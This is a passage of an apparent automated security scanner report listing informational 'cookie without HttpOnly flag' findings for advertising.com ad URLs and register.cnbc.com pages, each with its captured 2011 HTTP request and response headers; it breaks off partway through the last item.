previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://r1-ads.ace.advertising.com
Path:
/site=768033/size=300250/u=2/bnum=41330653/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 16:02:17 GMT; path=/ A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site=768033/size=300250/u=2/bnum=41330653/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1 Host: r1-ads.ace.advertising.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315342934886&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y" Comscore: CMXID=2115.1017217.768033.0XMC Cache-Control: private, max-age=0, no-cache Expires: Tue, 06 Sep 2011 16:02:17 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 561 Vary: Accept-Encoding Date: Tue, 06 Sep 2011 16:02:17 GMT Connection: closeSet-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 16:02:17 GMT; path=/ Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=4...[SNIP]...
13.143. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=64844327/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://r1-ads.ace.advertising.com
Path:
/site=768033/size=300250/u=2/bnum=64844327/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:41:40 GMT; path=/ A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site=768033/size=300250/u=2/bnum=64844327/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1 Host: r1-ads.ace.advertising.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315341697956&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y" Comscore: CMXID=2115.1017217.768033.0XMC Cache-Control: private, max-age=0, no-cache Expires: Tue, 06 Sep 2011 15:41:40 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 561 Date: Tue, 06 Sep 2011 15:41:40 GMT Connection: close Vary: Accept-EncodingSet-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:41:40 GMT; path=/ Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=6...[SNIP]...
13.144. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=70609416/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://r1-ads.ace.advertising.com
Path:
/site=768033/size=300250/u=2/bnum=70609416/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:21:07 GMT; path=/ A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site=768033/size=300250/u=2/bnum=70609416/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1 Host: r1-ads.ace.advertising.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340464698&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y" Comscore: CMXID=2115.1017217.768033.0XMC Cache-Control: private, max-age=0, no-cache Expires: Tue, 06 Sep 2011 15:21:07 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 561 Date: Tue, 06 Sep 2011 15:21:07 GMT Connection: close Vary: Accept-EncodingSet-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:21:07 GMT; path=/ Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7...[SNIP]...
13.145. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=7863048/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://r1-ads.ace.advertising.com
Path:
/site=768033/size=300250/u=2/bnum=7863048/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:15:56 GMT; path=/ A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site=768033/size=300250/u=2/bnum=7863048/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1 Host: r1-ads.ace.advertising.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340154901&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y" Comscore: CMXID=2115.1017217.768033.0XMC Cache-Control: private, max-age=0, no-cache Expires: Tue, 06 Sep 2011 15:15:56 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 559 Date: Tue, 06 Sep 2011 15:15:56 GMT Connection: close Vary: Accept-EncodingSet-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:15:56 GMT; path=/ Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7...[SNIP]...
13.146. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=80753902/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://r1-ads.ace.advertising.com
Path:
/site=768033/size=300250/u=2/bnum=80753902/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:31:23 GMT; path=/ A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site=768033/size=300250/u=2/bnum=80753902/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1 Host: r1-ads.ace.advertising.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315341080962&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y" Comscore: CMXID=2115.1017217.768033.0XMC Cache-Control: private, max-age=0, no-cache Expires: Tue, 06 Sep 2011 15:31:23 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 561 Date: Tue, 06 Sep 2011 15:31:23 GMT Connection: close Vary: Accept-EncodingSet-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:31:23 GMT; path=/ Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=8...[SNIP]...
13.147. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=92276994/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://r1-ads.ace.advertising.com
Path:
/site=768033/size=300250/u=2/bnum=92276994/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:57:07 GMT; path=/ A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site=768033/size=300250/u=2/bnum=92276994/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1 Host: r1-ads.ace.advertising.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315342624689&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y" Comscore: CMXID=2115.1017217.768033.0XMC Cache-Control: private, max-age=0, no-cache Expires: Tue, 06 Sep 2011 15:57:07 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 561 Date: Tue, 06 Sep 2011 15:57:07 GMT Connection: close Vary: Accept-EncodingSet-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:57:07 GMT; path=/ Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=9...[SNIP]...
13.148. http://register.cnbc.com/forgotPassword.do
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://register.cnbc.com
Path:
/forgotPassword.do
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_80=834785856.20480.0000; expires=Tue, 06-Sep-2011 18:01:48 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /forgotPassword.do HTTP/1.1 Host: register.cnbc.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA
Response
HTTP/1.1 302 Found Date: Tue, 06 Sep 2011 15:01:48 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Location: https://register.cnbc.com/forgotPassword.do Content-Length: 227 Connection: close Content-Type: text/html; charset=iso-8859-1Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_80=834785856.20480.0000; expires=Tue, 06-Sep-2011 18:01:48 GMT; path=/ <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://register.cnbc.com/forgotPassword.do">he...[SNIP]...
13.149. http://register.cnbc.com/forgotpassword1.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://register.cnbc.com
Path:
/forgotpassword1.jsp
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_80=1153552960.20480.0000; expires=Tue, 06-Sep-2011 18:01:47 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /forgotpassword1.jsp HTTP/1.1 Host: register.cnbc.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA
Response
HTTP/1.1 302 Found Date: Tue, 06 Sep 2011 15:01:47 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Location: https://register.cnbc.com/forgotpassword1.jsp Content-Length: 229 Connection: close Content-Type: text/html; charset=iso-8859-1Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_80=1153552960.20480.0000; expires=Tue, 06-Sep-2011 18:01:47 GMT; path=/ <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://register.cnbc.com/forgotpassword1.jsp">...[SNIP]...
13.150. https://register.cnbc.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:43 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:05:43 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Last-Modified: Thu, 13 Aug 2009 22:54:28 GMT ETag: "3b-4710dd15eb100" Accept-Ranges: bytes Content-Length: 59 Connection: close Content-Type: text/htmlSet-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:43 GMT; path=/ <script> window.location="http://www.cnbc.com"; </script>
13.151. https://register.cnbc.com/RandomImage.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/RandomImage.jsp
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:40 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RandomImage.jsp HTTP/1.1 Host: register.cnbc.com Connection: keep-alive Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627; s_cc=true; s_nr=1315339298449; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:01:40 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Pragma: no-cache Cache-Control: no-cache, no-store, must-revalidate Cache-Control: pre-check=0, post-check=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/htmlSet-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:40 GMT; path=/ Content-Length: 2261 ......JFIF.............C........... . ................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!22222222222222222222222222222222222222222222222222......2....".................................[SNIP]...
13.152. https://register.cnbc.com/cas
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/cas
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:44 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cas HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 06 Sep 2011 15:05:44 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Content-Length: 201 Connection: close Content-Type: text/html; charset=iso-8859-1Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:44 GMT; path=/ <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /cas was not found on this server.</p> </body></html>...[SNIP]...
13.153. https://register.cnbc.com/checkemail.do
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/checkemail.do
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:46 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /checkemail.do HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
